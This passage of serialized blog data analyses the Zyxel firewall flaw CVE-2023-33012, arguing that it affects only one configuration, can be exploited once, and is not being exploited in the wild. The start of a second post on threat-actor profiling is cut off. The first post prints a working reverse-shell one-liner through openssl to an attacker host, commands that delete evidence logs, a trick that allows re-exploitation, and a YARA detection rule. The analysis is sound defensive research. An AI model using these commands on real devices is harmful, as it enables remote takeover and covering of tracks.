vulnerable firmware have cloud management mode enabled?”"," It turns out that is easy to determine as well. ",[886,78838,78589],{}," expects the caller to send base64 encoded content in the config parameter. If the script receives invalid base64 encoded data, then it will respond to the client with the error code ",[886,78841,78842],{},"ParseError: 0xC0DE0004",". See the code below:",[1354,78845,78847],{"className":11719,"code":78846,"language":11721,"meta":219,"style":219},"if not os.path.exists(ztpinclude.SERVER_SOCK_FILE):\n logging.error(\"Cannot find sdwan_interface socket [%s]!\" % ztpinclude.SERVER_SOCK_FILE)\n print(\"ParseError: 0xC0DE0005\")\nelse:\n conf_str = urllib.unquote(conf_str) \n try:\n decoded_config = base64.b64decode(conf_str)\n except:\n logging.error(\"invalid base64 str %s\" % conf_str)\n print(\"ParseError: 0xC0DE0004\")\n return\n",[886,78848,78849,78875,78906,78920,78926,78950,78956,78977,78983,79010,79024],{"__ignoreMap":219},[1373,78850,78851,78853,78855,78857,78859,78861,78863,78865,78867,78869,78871,78873],{"class":1375,"line":1376},[1373,78852,4637],{"class":4636},[1373,78854,78483],{"class":1397},[1373,78856,63565],{"class":4640},[1373,78858,59],{"class":1383},[1373,78860,7590],{"class":63570},[1373,78862,59],{"class":1383},[1373,78864,78745],{"class":11735},[1373,78866,1384],{"class":1383},[1373,78868,78750],{"class":11735},[1373,78870,59],{"class":1383},[1373,78872,78755],{"class":37971},[1373,78874,78758],{"class":1383},[1373,78876,78877,78880,78882,78884,78886,78888,78890,78892,78894,78896,78898,78900,78902,78904],{"class":1375,"line":220},[1373,78878,78879],{"class":4640}," logging",[1373,78881,59],{"class":1383},[1373,78883,10265],{"class":11735},[1373,78885,1384],{"class":1383},[1373,78887,183],{"class":1387},[1373,78889,78774],{"class":1391},[1373,78891,38048],{"class":5467},[1373,78893,78779],{"class":1391},[1373,78895,183],{"class":1387},[1373,78897,78784],{"class":1397},[1373,78899,78787],{"class":11735},[1373,78901,59],{"class":1383},[1373,78903,78755],{"class":37971},[1373,78905,11875],{"class":1383},[1373,78907,78908,78910,78912,78914,78916,78918],{"class":1375,"line":1266},[1373,78909,63893],{"class":1379},[1373,78911,1384],{"class":1383},[1373,78913,183],{"class":1387},[1373,78915,78805],{"class":1391},[1373,78917,183],{"class":1387},[1373,78919,11875],{"class":1383},[1373,78921,78922,78924],{"class":1375,"line":1852},[1373,78923,4762],{"class":4636},[1373,78925,11747],{"class":1383},[1373,78927,78928,78931,78933,78936,78938,78941,78943,78946,78948],{"class":1375,"line":4692},[1373,78929,78930],{"class":4640}," conf_str ",[1373,78932,5417],{"class":1397},[1373,78934,78935],{"class":4640}," urllib",[1373,78937,59],{"class":1383},[1373,78939,78940],{"class":11735},"unquote",[1373,78942,1384],{"class":1383},[1373,78944,78945],{"class":11735},"conf_str",[1373,78947,2230],{"class":1383},[1373,78949,47181],{"class":4640},[1373,78951,78952,78954],{"class":1375,"line":4724},[1373,78953,11752],{"class":4636},[1373,78955,11747],{"class":1383},[1373,78957,78958,78961,78963,78966,78968,78971,78973,78975],{"class":1375,"line":4756},[1373,78959,78960],{"class":4640}," decoded_config ",[1373,78962,5417],{"class":1397},[1373,78964,78965],{"class":4640}," base64",[1373,78967,59],{"class":1383},[1373,78969,78970],{"class":11735},"b64decode",[1373,78972,1384],{"class":1383},[1373,78974,78945],{"class":11735},[1373,78976,11875],{"class":1383},[1373,78978,78979,78981],{"class":1375,"line":4768},[1373,78980,11786],{"class":4636},[1373,78982,11747],{"class":1383},[1373,78984,78985,78988,78990,78992,78994,78996,78999,79001,79003,79005,79008],{"class":1375,"line":4792},[1373,78986,78987],{"class":4640}," logging",[1373,78989,59],{"class":1383},[1373,78991,10265],{"class":11735},[1373,78993,1384],{"class":1383},[1373,78995,183],{"class":1387},[1373,78997,78998],{"class":1391},"invalid base64 str ",[1373,79000,38048],{"class":5467},[1373,79002,183],{"class":1387},[1373,79004,78784],{"class":1397},[1373,79006,79007],{"class":11735}," conf_str",[1373,79009,11875],{"class":1383},[1373,79011,79012,79014,79016,79018,79020,79022],{"class":1375,"line":4798},[1373,79013,63790],{"class":1379},[1373,79015,1384],{"class":1383},[1373,79017,183],{"class":1387},[1373,79019,78842],{"class":1391},[1373,79021,183],{"class":1387},[1373,79023,11875],{"class":1383},[1373,79025,79026],{"class":1375,"line":4806},[1373,79027,79028],{"class":4636}," return\n",[18,79030,79031],{},"In that way, we were able to scan the internet-facing Zyxel devices to determine how many used the vulnerable configuration. Of the ~7,600 that were using vulnerable firmware, we found only 607 that were using the vulnerable configuration.",[1925,79033,79034],{},[18,79035,79036],{},"Configuration of Zyxel Firewalls Using Firmware Affected By CVE-2023-33012",[78559,79038],{":labels":79039,":values":79040},"[\"SD-WAN Disabled (Not Vulnerable)\",\"SD-WAN Enabled\"]","[6990,607]",[18,79042,79043],{},"From the initial analysis, we went all the way from “Zyxel firewalls are affected by an unauthenticated remote command injection” to “Zyxel firewalls using an uncommon configuration are affected by unauthenticated remote command injection.” Which is a pretty important asterisk that got left out.",[18,79045,79046],{},"But that’s not the only caveat. There’s more.",[61,79048,79050],{"id":79049},"you-get-one-shot","You Get One Shot",[18,79052,79053,79054,79057,79058,79061],{},"The exploitation described by SSD is clever and fun to play with. The attacker can write arbitrary data to a file of their choosing using the ",[886,79055,79056],{},"option proto vti"," configuration (which Zyxel did not appear to fix in the 5.37.0 release). The attacker can then execute the file using a command injection in the ",[886,79059,79060],{},"option proto gre"," configuration. The command injection is space-limited to the point that executing a pre-upload file is the only option, so these two things work really well together.",[18,79063,79064],{},"The problem is that you can only do it once.",[18,79066,79067,79068,79070],{},"Looking at (edited) ",[886,79069,36300],{}," after exploitation, we see the following:",[1354,79072,79074],{"className":31740,"code":79073,"language":2186,"meta":219,"style":219},"root 14602 S 07:14 0:00 sh -c ip addr add ; . \u002Ftmp\u002FfYW.qsr; #\u002F24 brd + dev gre1\nroot 14606 S 07:14 0:00 \\_ sh -i\nroot 14649 R 07:14 0:00 | \\_ ps faux\nroot 14607 S 07:14 0:00 \\_ openssl s_client -quiet -connect 10.12.70.252:1271\n",[886,79075,79076,79117,79138,79164],{"__ignoreMap":219},[1373,79077,79078,79080,79083,79086,79089,79092,79094,79096,79099,79102,79105,79107,79109,79112,79114],{"class":1375,"line":1376},[1373,79079,48771],{"class":2206},[1373,79081,79082],{"class":5467}," 14602",[1373,79084,79085],{"class":1391}," S",[1373,79087,79088],{"class":1391}," 07:14",[1373,79090,79091],{"class":1391}," 0:00",[1373,79093,2236],{"class":1391},[1373,79095,45587],{"class":2209},[1373,79097,79098],{"class":1391}," ip",[1373,79100,79101],{"class":1391}," addr",[1373,79103,79104],{"class":1391}," add",[1373,79106,57171],{"class":1383},[1373,79108,1398],{"class":1379},[1373,79110,79111],{"class":1391}," \u002Ftmp\u002FfYW.qsr",[1373,79113,39663],{"class":1383},[1373,79115,79116],{"class":4630}," #\u002F24 brd + dev gre1\n",[1373,79118,79119,79121,79124,79126,79128,79130,79133,79135],{"class":1375,"line":220},[1373,79120,48771],{"class":2206},[1373,79122,79123],{"class":5467}," 14606",[1373,79125,79085],{"class":1391},[1373,79127,79088],{"class":1391},[1373,79129,79091],{"class":1391},[1373,79131,79132],{"class":2326}," \\_",[1373,79134,2236],{"class":1391},[1373,79136,79137],{"class":2209}," -i\n",[1373,79139,79140,79142,79145,79148,79150,79152,79155,79158,79161],{"class":1375,"line":1266},[1373,79141,48771],{"class":2206},[1373,79143,79144],{"class":5467}," 14649",[1373,79146,79147],{"class":1391}," R",[1373,79149,79088],{"class":1391},[1373,79151,79091],{"class":1391},[1373,79153,79154],{"class":1397}," |",[1373,79156,79157],{"class":2206}," \\_",[1373,79159,79160],{"class":1391}," ps",[1373,79162,79163],{"class":1391}," faux\n",[1373,79165,79166,79168,79171,79173,79175,79177,79179,79182,79185,79188,79191],{"class":1375,"line":1852},[1373,79167,48771],{"class":2206},[1373,79169,79170],{"class":5467}," 14607",[1373,79172,79085],{"class":1391},[1373,79174,79088],{"class":1391},[1373,79176,79091],{"class":1391},[1373,79178,79132],{"class":2326},[1373,79180,79181],{"class":1391}," openssl",[1373,79183,79184],{"class":1391}," s_client",[1373,79186,79187],{"class":2209}," -quiet",[1373,79189,79190],{"class":2209}," -connect",[1373,79192,79193],{"class":1391}," 10.12.70.252:1271\n",[18,79195,79196,79197,79200,79201,79204],{},"The injection occurs during an attempted ",[886,79198,79199],{},"ip addr \u003Cuser provided>\u002F24 brd + dev gre1"," command. The offending code from ",[886,79202,79203],{},"\u002Fusr\u002Fsbin\u002Fsdwan_interface"," is easy to visualize in a decompiler. The order of operations turns out to be very important, but below, you can see the software brings up the GRE interface, sets the multicast transmit queue size, and auto-configures the broadcast address (where exploitation finally occurs):",[18,79206,79207],{},[68,79208],{":width":10862,"alt":79209,"src":79210},"Decompiled output from sdwan_interface","\u002Fblog\u002Fzyxel-cve-2023-33012\u002Fdecompiled-CVE-2023-33012.png",[18,79212,79213,79214,4606],{},"Upon failure of the final command, the following is logged to ",[886,79215,79216],{},"\u002Ftmp\u002Fsdwan_interface\u002Fsdwan_interface.log",[1354,79218,79221],{"className":79219,"code":79220,"language":1359},[1357],"[Fri Feb 16 19:58:49 2024] [zld_interface_server:806] name=xBwHq, reset_interface=1\n[Fri Feb 16 19:58:50 2024] [add_gre_tunnel:435] add_gre_tunnel [ERROR]: cmd error[32512]: ip addr add ; . \u002Ftmp\u002FMGb.qsr; #\u002F24 brd + dev gre1\n[Fri Feb 16 19:58:50 2024] [apply_zone_to_kernel:22] apply zone to kernel = 1, 21, gre1\n",[886,79222,79220],{"__ignoreMap":219},[18,79224,79225,79226,79229],{},"The logging and decompilation screenshots are important because they provide evidence of why this vulnerability ",[1131,79227,79228],{},"can only be exploited once",". A subsequent exploit attempt generates the following log:",[1354,79231,79234],{"className":79232,"code":79233,"language":1359},[1357],"[Fri Feb 16 20:10:59 2024] [zld_interface_server:806] name=XsDfb, reset_interface=1\n[Fri Feb 16 20:10:59 2024] [add_gre_tunnel:420] add_gre_tunnel [ERROR]: cmd error[65280]: ifconfig gre2 up\n[Fri Feb 16 20:10:59 2024] [apply_zone_to_kernel:22] apply zone to kernel = 1, 21, gre2\n",[886,79235,79233],{"__ignoreMap":219},[18,79237,79238,79239,79242,79243,79246,79247,79249,79250,79253],{},"Here we see that the firewall has attempted operations on a new GRE interface (",[886,79240,79241],{},"gre2","), but the command ",[886,79244,79245],{},"ifconfig gre2 up"," fails. The interface doesn’t exist. When ",[886,79248,79245],{}," fails, ",[886,79251,79252],{},"ip addr add"," is never executed. The first successful exploitation leaves the firewall in a state where it cannot be exploited again! This important caveat was certainly never mentioned.",[18,79255,79256,79257,79259],{},"An attacker who knows what they are doing ",[1131,79258,57415],{}," work around this limitation. If the attacker removes the old GRE interface, the software will bring up a new one. Our post-exploitation script has something like:",[1354,79261,79263],{"className":31740,"code":79262,"language":2186,"meta":219,"style":219},"ifconfig gre1 down; ip tunnel del gre1 mode gre;\n",[886,79264,79265],{"__ignoreMap":219},[1373,79266,79267,79269,79272,79275,79277,79279,79282,79285,79287,79289,79292],{"class":1375,"line":1376},[1373,79268,55390],{"class":2206},[1373,79270,79271],{"class":1391}," gre1",[1373,79273,79274],{"class":1391}," down",[1373,79276,39663],{"class":1383},[1373,79278,79098],{"class":2206},[1373,79280,79281],{"class":1391}," tunnel",[1373,79283,79284],{"class":1391}," del",[1373,79286,79271],{"class":1391},[1373,79288,76181],{"class":1391},[1373,79290,79291],{"class":1391}," gre",[1373,79293,4912],{"class":1383},[18,79295,79296,79297,79299,79300,79302],{},"The next time the target is exploited, it will successfully create ",[886,79298,79241],{},", which allows ",[886,79301,79245],{}," to run successfully and open up access to the vulnerable command.",[61,79304,79305],{"id":25141},"Exploitation in the Wild",[18,79307,79308,79309,10515,79314,79319,79320,79323],{},"The SSD writeup ",[47,79310,79313],{"href":79311,"rel":79312},"https:\u002F\u002Fwww.reddit.com\u002Fr\u002Fnetsec\u002Fcomments\u002F19f9q8c\u002Fnew_zyxel_rce_vulnerability_allows_remote\u002F",[51],"gained",[47,79315,79318],{"href":79316,"rel":79317},"https:\u002F\u002Ftwitter.com\u002Fptracesecurity\u002Fstatus\u002F1751289074537619646",[51],"some"," attention, so we were interested if anyone attempted to exploit this in the wild. For whatever reason, the firewalls make the ZTP log available to remote and unauthenticated users through the ",[886,79321,79322],{},"\u002Fztp\u002Fcgi-bin\u002Fdumpztplog.py"," endpoint. In that log file, an exploitation attempt will look something like this:",[1354,79325,79328],{"className":79326,"code":79327,"language":1359},[1357],"INFO:root:ztp_led_start\nINFO:root:sending \"1\"\nINFO:root:closing socket\nINFO:root:init\nINFO:root:setting up vti interface\nINFO:root:((cd=\u002Ftmp; mknod Hua p; sh -i \u003C Hua 2>&1 | openssl s_client -quiet -connect 10.12.70.252:1270 > Hua; rm Hua;)&);((sleep 20; ifconfig gre1 down; ip tunnel del gre1 mode gre; rm \u002Fvar\u002Flog\u002Fztplog \u002Ftmp\u002Fsdwan_interface\u002Fsdwan_interface.log \u002Ftmp\u002F*.qsr)&);; name=EAg; proto=vti\nINFO:root:parse config error : {'((cd': '\u002Ftmp; mknod Hua p; sh -i \u003C Hua 2>&1 | openssl s_client -quiet -connect 10.12.70.252:1270 > Hua; rm Hua;)&);((sleep 20; ifconfig gre1 down; ip tunnel del gre1 mode gre; rm \u002Fvar\u002Flog\u002Fztplog \u002Ftmp\u002Fsdwan_interface\u002Fsdwan_interface.log \u002Ftmp\u002F*.qsr)&);', 'name': 'EAg', 'proto': 'vti'}\nINFO:root:KeyError('ipaddr',)\nINFO:root:ztp_led_start\nINFO:root:sending \"1\"\nINFO:root:closing socket\nINFO:root:init\nINFO:root:setting up gre interface\nINFO:root:name=XsDfb; proto=gre; ipaddr=; . \u002Ftmp\u002FEAg.qsr; #; localip=127.0.0.1; netmask=24; remoteip=127.0.0.1; gateway=0\n[IPC]argc = 8\n[IPC]IPC result: 1 \n",[886,79329,79327],{"__ignoreMap":219},[18,79331,79332,79333,79336,79337,79340],{},"Above, you can see both the file write (line ending with ",[886,79334,79335],{},"proto=vti",") and the command injection (line ending with ",[886,79338,79339],{},"gateway=0",") are present. A very simple YARA rule to parse the logs for exploitation looks like:",[1354,79342,79345],{"className":79343,"code":79344,"language":1359},[1357],"rule Zyxel_CVE_2023_33012\n{\n meta:\n description = \"Zyxel ZTP Config Parser Exploit Attempt\"\n path_pattern = \"\u002Fztp\u002Fcgi-bin\u002Fdumpztplog.py\"\n strings:\n $vti = \"proto=vti\"\n $gre = \"proto=gre\"\n $tmp = \"\u002Ftmp\u002F\"\n $qsr = \".qsr\"\n condition:\n all of them\n}\n",[886,79346,79344],{"__ignoreMap":219},[18,79348,79349],{},"We grabbed the ZTP logs of all ~7,600 firewalls using vulnerable firmware and found… absolutely nothing that looked like an exploitation attempt. Of course, the ZTP log is deleted on reboot (and an attacker can delete on exploitation), but this seems like a reasonable indicator that it isn’t being widely exploited.",[18,79351,79352,79353,79356],{},"We did find 18,000+ log entries that read, ",[886,79354,79355],{},"ERROR:root:Cannot find sdwan_interface socket [\u002Ftmp\u002Fsdw_iface_server.sock]!"," This does prove the interface is seeing traffic, but because those endpoints aren’t vulnerable, we see nothing more in the logs.",[18,79358,79359,79360,79363,79364,79369,79370,79373],{},"As a final attempt to determine if this is being actively exploited in the wild, we turned to our friends at GreyNoise. Looking at ",[886,79361,79362],{},"raw_data.web.paths:\"\u002Fztp\u002Fcgi-bin\u002Fparse_config.py”"," shows ",[47,79365,79368],{"href":79366,"rel":79367},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002Fraw_data.web.paths:%22%2Fztp%2Fcgi-bin%2Fparse_config.py%22",[51],"no results",", so they aren’t seeing the exploit hit their honeypots. They do see one IP address doing Zyxel version probing via ",[886,79371,79372],{},"zld_product_spec.js"," just like the SSD proof of concept, but that's about it.",[18,79375,79376],{},[68,79377],{":width":10862,"alt":79378,"src":79379},"GreyNoise flagged IP scanning for Zyxel","\u002Fblog\u002Fzyxel-cve-2023-33012\u002Fgreynoise-zyxel-scanning.png",[18,79381,79382],{},"There’s basically no evidence that this vulnerability is being exploited in the wild at any scale, and with so few vulnerable targets remaining, we assume it never will be.",[61,79384,1903],{"id":1902},[18,79386,79387],{},"The goal of vulnerability disclosure should be to inform and provide actionable intelligence. Publishing incorrect, obfuscated, and\u002For misleading information wastes everyone’s time and only introduces more FUD to an industry that is already drowning in it. This Zyxel firewall issue did not live up to the disclosure. It only affects a specific configuration, is not easy to re-exploit, and was assigned a CVE when patched six months ago. Most Zyxel users needn’t have ever worried about it.",[61,79389,202],{"id":201},[18,79391,63449,79392,982,79395,65315,79398,982,79401,63288],{},[47,79393,40447],{"href":53829,"rel":79394},[51],[47,79396,55229],{"href":53837,"rel":79397},[51],[47,79399,1245],{"href":45535,"rel":79400},[51],[47,79402,216],{"href":214,"rel":79403},[51],[2901,79405,79406],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":79408},[79409,79410,79411,79412,79413,79414],{"id":11647,"depth":220,"text":11648},{"id":78574,"depth":220,"text":78575},{"id":79049,"depth":220,"text":79050},{"id":25141,"depth":220,"text":79305},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2024-02-21","VulnCheck uncovers the truth behind the recently published Zyxel pre-auth remote code execution: limited to specific configurations, limitations on repeated exploitation, and no evidence of active exploitation.",{"slug":79418},"zyxel-cve-2023-33012","\u002Fblog\u002Fzyxel-cve-2023-33012",{"title":58315,"description":79416},"blog\u002Fzyxel-cve-2023-33012",[242,23275],"RPoTvYySiHkg3a3UxxYrmKLBVbCky-S7rlq8rNDGcUk",{"id":79425,"title":79426,"articles":79427,"authors":79436,"body":79438,"date":81086,"description":79448,"extension":234,"image":7,"link":7,"meta":81087,"navigation":237,"path":81089,"seo":81090,"series":7,"stem":81091,"subtype":7,"tags":81092,"__hash__":81093},"blog\u002Fblog\u002Fhow-we-think-about-threat-actors.md","Reimagining How We Think About Threat Actors",[79428,79432],{"title":79429,"source":61436,"link":79430,"date":79431},"Risky Biz News: New NSO Group capability revealed in court documents","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-new-nso-group-capability-revealed-in-court-documents\u002F?ref=risky-business-news-newsletter","2024-02-19",{"title":79433,"source":3508,"link":79434,"date":79435},"A Look at the UK's National Cyber Security Centre's Vulnerability Management Guidance","https:\u002F\u002Fresilientcyber.substack.com\u002Fp\u002Fa-look-at-the-uks-national-cyber","2024-02-25",[79437],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":79439,"toc":81077},[79440,79446,79449,79452,79455,79458,79462,79465,79471,79474,79697,79701,79704,79710,79713,80374,80378,80381,80387,80390,80611,80615,80618,80624,80627,81049,81053,81056,81060,81064,81067,81069,81074],[18,79441,79442],{},[68,79443],{":width":10862,"alt":79444,"src":79445},"Threat-Actors-Cozy-Bear","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Threat-Actor.png",[18,79447,79448],{},"Taking a data-driven approach to visualizing the profile of threat actors can provide meaningful information without the time-consuming process of sifting through lengthy reports of information.",[18,79450,79451],{},"Let’s explore how we can accomplish this through the exercise in exploring a threat actor with a simple question…\nWhat do Cozy Bear, APT29, Midnight Blizzard, Zimbra, Exchange, TeamCity, CVE-2023-42793, CVE-2021-1879, China, United States, TI053-005 and TI548-002 all have in common?",[18,79453,79454],{},"They are all associated with the same threat actor often referred to as Cozy Bear (Crowdstrike), APT29 (Mandiant), Midnight Blizzard (Microsoft), or one of the other 13 names the Russian nation-state threat actor has been given.",[18,79456,79457],{},"When it comes to the anatomies of threat actors, there are many different attributes, techniques and tactics to be explored. Using VulnCheck’s Threat Actor API Endpoint, I now have quick access to broad intelligence on threat actors. Pivoting to additional vulnerability\u002Fexploitation data that I can use to expand a threat actor’s profile in the future. But, before I jump into the weeds too deep, let’s start by exploring the basic anatomy of a single threat actor: Cozy Bear.",[61,79459,79461],{"id":79460},"threat-actor-identifiers-aliases","Threat Actor Identifiers \u002F Aliases",[18,79463,79464],{},"We can start by exploring a threat actor using one of multiple names or IDs generated by Mitre, MISP, Malpedia, Crowdstrike and\u002For Microsoft. Here we can see that Cozy Bear is the name of the threat actor that is used by Crowdstrike that we default to using as the primary name. Microsoft refers to the same threat actor as “Midnight Blizzard,” and both Mandiant and Mitre refer to it as “APT 29.” In total there are 15 threat actor names associated with Cozy Bear… that we know of.",[18,79466,79467],{},[68,79468],{":width":10862,"alt":79469,"src":79470},"Threat-Actors-Cozy-Bear-Aliases","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Aliases.png",[18,79472,79473],{},"Example JSON Threat Actor Names:",[1354,79475,79477],{"className":22307,"code":79476,"language":22309,"meta":219,"style":219}," \"threat_actor_name\": \"Cozy Bear\",\n \"date_added\": \"2016-08-04\",\n \"mitre_id\": \"G0016\",\n \"misp_id\": \"b2056ff0-00b9-482e-b11c-c771daa5f28a\",\n \"malpedia_url\": \"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fapt29\",\n \"vendor_names_for_threat_actors\": [\n {\n \"vendor_name\": \"CrowdStrike\",\n \"threat_actor_name\": \"Cozy Bear\"\n },\n {\n \"vendor_name\": \"Microsoft\",\n \"threat_actor_name\": \"Midnight Blizzard\",\n \"url\": \"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fmicrosoft-365\u002Fsecurity\u002Fintelligence\u002Fmicrosoft-threat-actor-naming\"\n }\n",[886,79478,79479,79499,79518,79538,79558,79578,79591,79595,79615,79631,79635,79639,79657,79676,79693],{"__ignoreMap":219},[1373,79480,79481,79483,79486,79488,79490,79492,79495,79497],{"class":1375,"line":1376},[1373,79482,23732],{"class":1387},[1373,79484,79485],{"class":1391},"threat_actor_name",[1373,79487,183],{"class":1387},[1373,79489,20051],{"class":4640},[1373,79491,183],{"class":1387},[1373,79493,79494],{"class":1391},"Cozy Bear",[1373,79496,183],{"class":1387},[1373,79498,9062],{"class":4640},[1373,79500,79501,79503,79505,79507,79509,79511,79514,79516],{"class":1375,"line":220},[1373,79502,23732],{"class":1387},[1373,79504,12998],{"class":1391},[1373,79506,183],{"class":1387},[1373,79508,20051],{"class":4640},[1373,79510,183],{"class":1387},[1373,79512,79513],{"class":1391},"2016-08-04",[1373,79515,183],{"class":1387},[1373,79517,9062],{"class":4640},[1373,79519,79520,79522,79525,79527,79529,79531,79534,79536],{"class":1375,"line":1266},[1373,79521,23732],{"class":1387},[1373,79523,79524],{"class":1391},"mitre_id",[1373,79526,183],{"class":1387},[1373,79528,20051],{"class":4640},[1373,79530,183],{"class":1387},[1373,79532,79533],{"class":1391},"G0016",[1373,79535,183],{"class":1387},[1373,79537,9062],{"class":4640},[1373,79539,79540,79542,79545,79547,79549,79551,79554,79556],{"class":1375,"line":1852},[1373,79541,23732],{"class":1387},[1373,79543,79544],{"class":1391},"misp_id",[1373,79546,183],{"class":1387},[1373,79548,20051],{"class":4640},[1373,79550,183],{"class":1387},[1373,79552,79553],{"class":1391},"b2056ff0-00b9-482e-b11c-c771daa5f28a",[1373,79555,183],{"class":1387},[1373,79557,9062],{"class":4640},[1373,79559,79560,79562,79565,79567,79569,79571,79574,79576],{"class":1375,"line":4692},[1373,79561,23732],{"class":1387},[1373,79563,79564],{"class":1391},"malpedia_url",[1373,79566,183],{"class":1387},[1373,79568,20051],{"class":4640},[1373,79570,183],{"class":1387},[1373,79572,79573],{"class":1391},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fapt29",[1373,79575,183],{"class":1387},[1373,79577,9062],{"class":4640},[1373,79579,79580,79582,79585,79587,79589],{"class":1375,"line":4724},[1373,79581,23732],{"class":1387},[1373,79583,79584],{"class":1391},"vendor_names_for_threat_actors",[1373,79586,183],{"class":1387},[1373,79588,20051],{"class":4640},[1373,79590,9050],{"class":1383},[1373,79592,79593],{"class":1375,"line":4756},[1373,79594,9613],{"class":1383},[1373,79596,79597,79599,79602,79604,79606,79608,79611,79613],{"class":1375,"line":4768},[1373,79598,26357],{"class":9152},[1373,79600,79601],{"class":9155},"vendor_name",[1373,79603,183],{"class":9152},[1373,79605,4606],{"class":1383},[1373,79607,4883],{"class":9173},[1373,79609,79610],{"class":9176},"CrowdStrike",[1373,79612,183],{"class":9173},[1373,79614,9062],{"class":1383},[1373,79616,79617,79619,79621,79623,79625,79627,79629],{"class":1375,"line":4792},[1373,79618,26357],{"class":9152},[1373,79620,79485],{"class":9155},[1373,79622,183],{"class":9152},[1373,79624,4606],{"class":1383},[1373,7962